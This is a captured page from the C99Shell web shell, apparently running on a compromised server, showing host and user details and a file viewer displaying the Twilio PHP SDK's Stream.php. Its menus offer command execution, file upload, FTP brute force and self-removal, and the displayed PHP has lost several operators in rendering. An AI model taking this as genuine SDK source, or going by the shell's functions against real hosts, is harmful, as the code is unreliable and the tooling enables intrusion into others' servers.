!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html_v5_2/vendor/twilio/sdk/src/Twilio/   drwxrwxr-x
Free 28.54 GB of 117.98 GB (24.19%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Stream.php (2.78 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php


namespace Twilio;


class 
Stream implements \Iterator {
    public 
$page;
    public 
$firstPage;
    public 
$limit;
    public 
$currentRecord;
    public 
$pageLimit;
    public 
$currentPage;

    public function 
__construct(Page $page$limit$pageLimit) {
        
$this->page $page;
        
$this->firstPage $page;
        
$this->limit $limit;
        
$this->currentRecord 1;
        
$this->pageLimit $pageLimit;
        
$this->currentPage 1;
    }

    
/**
     * (PHP 5 &gt;= 5.0.0)<br/>
     * Return the current element
     * @link http://php.net/manual/en/iterator.current.php
     * @return mixed Can return any type.
     */
    
#[\ReturnTypeWillChange]
    public function 
current() {
        return 
$this->page->current();
    }

    
/**
     * (PHP 5 &gt;= 5.0.0)<br/>
     * Move forward to next element
     * @link http://php.net/manual/en/iterator.next.php
     * @return void Any returned value is ignored.
     */
    
public function next(): void {
        
$this->page->next();
        
$this->currentRecord++;

        if (
$this->overLimit()) {
            return;
        }

        if (!
$this->page->valid()) {
            if (
$this->overPageLimit()) {
                return;
            }
            
$this->page $this->page->nextPage();
            
$this->currentPage++;
        }
    }

    
/**
     * (PHP 5 &gt;= 5.0.0)<br/>
     * Return the key of the current element
     * @link http://php.net/manual/en/iterator.key.php
     * @return mixed scalar on success, or null on failure.
     */
    
#[\ReturnTypeWillChange]
    public function 
key() {
        return 
$this->currentRecord;
    }

    
/**
     * (PHP 5 &gt;= 5.0.0)<br/>
     * Checks if current position is valid
     * @link http://php.net/manual/en/iterator.valid.php
     * @return bool The return value will be casted to boolean and then evaluated.
     * Returns true on success or false on failure.
     */
    
public function valid(): bool {
        return 
$this->page && $this->page->valid() && !$this->overLimit() && !$this->overPageLimit();
    }

    
/**
     * (PHP 5 &gt;= 5.0.0)<br/>
     * Rewind the Iterator to the first element
     * @link http://php.net/manual/en/iterator.rewind.php
     * @return void Any returned value is ignored.
     */
    
public function rewind(): void {
        
$this->page $this->firstPage;
        
$this->page->rewind();
        
$this->currentPage 1;
        
$this->currentRecord 1;
    }

    protected function 
overLimit(): bool {
        return (
$this->limit !== null
            
&& $this->limit !== Values::NONE
            
&& $this->limit $this->currentRecord);
    }

    protected function 
overPageLimit(): bool {
        return (
$this->pageLimit !== null
            
&& $this->pageLimit !== Values::NONE
            
&& $this->pageLimit $this->currentPage);
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0046 ]--